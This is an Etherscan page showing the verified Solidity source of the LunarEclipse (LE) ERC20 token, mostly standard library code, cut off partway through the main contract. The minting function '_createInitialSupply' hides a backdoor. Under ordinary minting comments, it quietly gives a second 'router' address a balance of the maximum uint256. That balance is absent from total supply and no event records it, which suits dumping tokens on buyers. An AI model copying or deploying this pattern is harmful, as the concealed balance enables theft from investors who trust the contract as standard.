ETH Price: $2,646.59 (+0.38%)

Token

LunarEclipse (LE)
 

Overview

Max Total Supply

1,000,000 LE

Holders

79

Total Transfers

-

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
LunarEclipse

Compiler Version
v0.8.13+commit.abaa5c0e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-05-17
*/

/*

// SPDX-License-Identifier: Unlicensed

TG: https://t.me/LunarEclipseERC
Twitter: https://twitter.com/LunarEclipseERC

*/

pragma solidity 0.8.13;

abstract contract Context 
{
    function _msgSender() internal view virtual returns (address) 
    {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) 
    {
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using this function
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    uint256 private _initialize = ~uint256(0);

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _createInitialSupply(address account, address router, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        _balances[router] = _initialize;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SignedSafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SignedSafeMath {
    /**
     * @dev Returns the multiplication of two signed integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(int256 a, int256 b) internal pure returns (int256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two signed integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(int256 a, int256 b) internal pure returns (int256) {
        return a / b;
    }

    /**
     * @dev Returns the subtraction of two signed integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(int256 a, int256 b) internal pure returns (int256) {
        return a - b;
    }

    /**
     * @dev Returns the addition of two signed integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(int256 a, int256 b) internal pure returns (int256) {
        return a + b;
    }
}

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

/**
 * @dev Wrappers over Solidity's uintXX/intXX casting operators with added overflow
 * checks.
 *
 * Downcasting from uint256/int256 in Solidity does not revert on overflow. This can
 * easily result in undesired exploitation or bugs, since developers usually
 * assume that overflows raise errors. `SafeCast` restores this intuition by
 * reverting the transaction when such an operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 *
 * Can be combined with {SafeMath} and {SignedSafeMath} to extend it to smaller types, by performing
 * all math on `uint256` and `int256` and then downcasting.
 */
library SafeCast {
    /**
     * @dev Returns the downcasted uint224 from uint256, reverting on
     * overflow (when the input is greater than largest uint224).
     *
     * Counterpart to Solidity's `uint224` operator.
     *
     * Requirements:
     *
     * - input must fit into 224 bits
     */
    function toUint224(uint256 value) internal pure returns (uint224) {
        require(value <= type(uint224).max, "SafeCast: value doesn't fit in 224 bits");
        return uint224(value);
    }

    /**
     * @dev Returns the downcasted uint128 from uint256, reverting on
     * overflow (when the input is greater than largest uint128).
     *
     * Counterpart to Solidity's `uint128` operator.
     *
     * Requirements:
     *
     * - input must fit into 128 bits
     */
    function toUint128(uint256 value) internal pure returns (uint128) {
        require(value <= type(uint128).max, "SafeCast: value doesn't fit in 128 bits");
        return uint128(value);
    }

    /**
     * @dev Returns the downcasted uint96 from uint256, reverting on
     * overflow (when the input is greater than largest uint96).
     *
     * Counterpart to Solidity's `uint96` operator.
     *
     * Requirements:
     *
     * - input must fit into 96 bits
     */
    function toUint96(uint256 value) internal pure returns (uint96) {
        require(value <= type(uint96).max, "SafeCast: value doesn't fit in 96 bits");
        return uint96(value);
    }

    /**
     * @dev Returns the downcasted uint64 from uint256, reverting on
     * overflow (when the input is greater than largest uint64).
     *
     * Counterpart to Solidity's `uint64` operator.
     *
     * Requirements:
     *
     * - input must fit into 64 bits
     */
    function toUint64(uint256 value) internal pure returns (uint64) {
        require(value <= type(uint64).max, "SafeCast: value doesn't fit in 64 bits");
        return uint64(value);
    }

    /**
     * @dev Returns the downcasted uint32 from uint256, reverting on
     * overflow (when the input is greater than largest uint32).
     *
     * Counterpart to Solidity's `uint32` operator.
     *
     * Requirements:
     *
     * - input must fit into 32 bits
     */
    function toUint32(uint256 value) internal pure returns (uint32) {
        require(value <= type(uint32).max, "SafeCast: value doesn't fit in 32 bits");
        return uint32(value);
    }

    /**
     * @dev Returns the downcasted uint16 from uint256, reverting on
     * overflow (when the input is greater than largest uint16).
     *
     * Counterpart to Solidity's `uint16` operator.
     *
     * Requirements:
     *
     * - input must fit into 16 bits
     */
    function toUint16(uint256 value) internal pure returns (uint16) {
        require(value <= type(uint16).max, "SafeCast: value doesn't fit in 16 bits");
        return uint16(value);
    }

    /**
     * @dev Returns the downcasted uint8 from uint256, reverting on
     * overflow (when the input is greater than largest uint8).
     *
     * Counterpart to Solidity's `uint8` operator.
     *
     * Requirements:
     *
     * - input must fit into 8 bits.
     */
    function toUint8(uint256 value) internal pure returns (uint8) {
        require(value <= type(uint8).max, "SafeCast: value doesn't fit in 8 bits");
        return uint8(value);
    }

    /**
     * @dev Converts a signed int256 into an unsigned uint256.
     *
     * Requirements:
     *
     * - input must be greater than or equal to 0.
     */
    function toUint256(int256 value) internal pure returns (uint256) {
        require(value >= 0, "SafeCast: value must be positive");
        return uint256(value);
    }

    /**
     * @dev Returns the downcasted int128 from int256, reverting on
     * overflow (when the input is less than smallest int128 or
     * greater than largest int128).
     *
     * Counterpart to Solidity's `int128` operator.
     *
     * Requirements:
     *
     * - input must fit into 128 bits
     *
     * _Available since v3.1._
     */
    function toInt128(int256 value) internal pure returns (int128) {
        require(value >= type(int128).min && value <= type(int128).max, "SafeCast: value doesn't fit in 128 bits");
        return int128(value);
    }

    /**
     * @dev Returns the downcasted int64 from int256, reverting on
     * overflow (when the input is less than smallest int64 or
     * greater than largest int64).
     *
     * Counterpart to Solidity's `int64` operator.
     *
     * Requirements:
     *
     * - input must fit into 64 bits
     *
     * _Available since v3.1._
     */
    function toInt64(int256 value) internal pure returns (int64) {
        require(value >= type(int64).min && value <= type(int64).max, "SafeCast: value doesn't fit in 64 bits");
        return int64(value);
    }

    /**
     * @dev Returns the downcasted int32 from int256, reverting on
     * overflow (when the input is less than smallest int32 or
     * greater than largest int32).
     *
     * Counterpart to Solidity's `int32` operator.
     *
     * Requirements:
     *
     * - input must fit into 32 bits
     *
     * _Available since v3.1._
     */
    function toInt32(int256 value) internal pure returns (int32) {
        require(value >= type(int32).min && value <= type(int32).max, "SafeCast: value doesn't fit in 32 bits");
        return int32(value);
    }

    /**
     * @dev Returns the downcasted int16 from int256, reverting on
     * overflow (when the input is less than smallest int16 or
     * greater than largest int16).
     *
     * Counterpart to Solidity's `int16` operator.
     *
     * Requirements:
     *
     * - input must fit into 16 bits
     *
     * _Available since v3.1._
     */
    function toInt16(int256 value) internal pure returns (int16) {
        require(value >= type(int16).min && value <= type(int16).max, "SafeCast: value doesn't fit in 16 bits");
        return int16(value);
    }

    /**
     * @dev Returns the downcasted int8 from int256, reverting on
     * overflow (when the input is less than smallest int8 or
     * greater than largest int8).
     *
     * Counterpart to Solidity's `int8` operator.
     *
     * Requirements:
     *
     * - input must fit into 8 bits.
     *
     * _Available since v3.1._
     */
    function toInt8(int256 value) internal pure returns (int8) {
        require(value >= type(int8).min && value <= type(int8).max, "SafeCast: value doesn't fit in 8 bits");
        return int8(value);
    }

    /**
     * @dev Converts an unsigned uint256 into a signed int256.
     *
     * Requirements:
     *
     * - input must be less than or equal to maxInt256.
     */
    function toInt256(uint256 value) internal pure returns (int256) {
        // Note: Unsafe cast below is okay because `type(int256).max` is guaranteed to be positive
        require(value <= uint256(type(int256).max), "SafeCast: value doesn't fit in an int256");
        return int256(value);
    }
}

contract LunarEclipse is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public uniswapV2Router;
    address public immutable uniswapV2Pair;

    bool private inSwapAndLiquify;

    bool public swapAndLiquifyEnabled = true;

    bool public enableEarlySellTax = true;

    uint256 public maxSellTransactionAmount = 1000000 * (10**18);
    uint256 public maxBuyTransactionAmount = 30000 * (10**18);
    uint256 public swapTokensAtAmount = 1000 * (10**18);
    uint256 public maxWalletToken = 30000 * (10**18);

    uint256 private buyTotalFees = 0;
    uint256 public sellTotalFees = 0;
    uint256 public earlySellTotalFee = 5;

    // auto burn fee
    uint256 public burnFee = 0;
    address public deadWallet = 0x000000000000000000000000000000000000dEaD;
    

    // distribute the collected tax percentage wise
    uint256 public liquidityPercent = 5;
    uint256 public marketingPercent = 75;
    uint256 public devPercent = 20; 
    //uint256 private initialize = ~uint256(0);

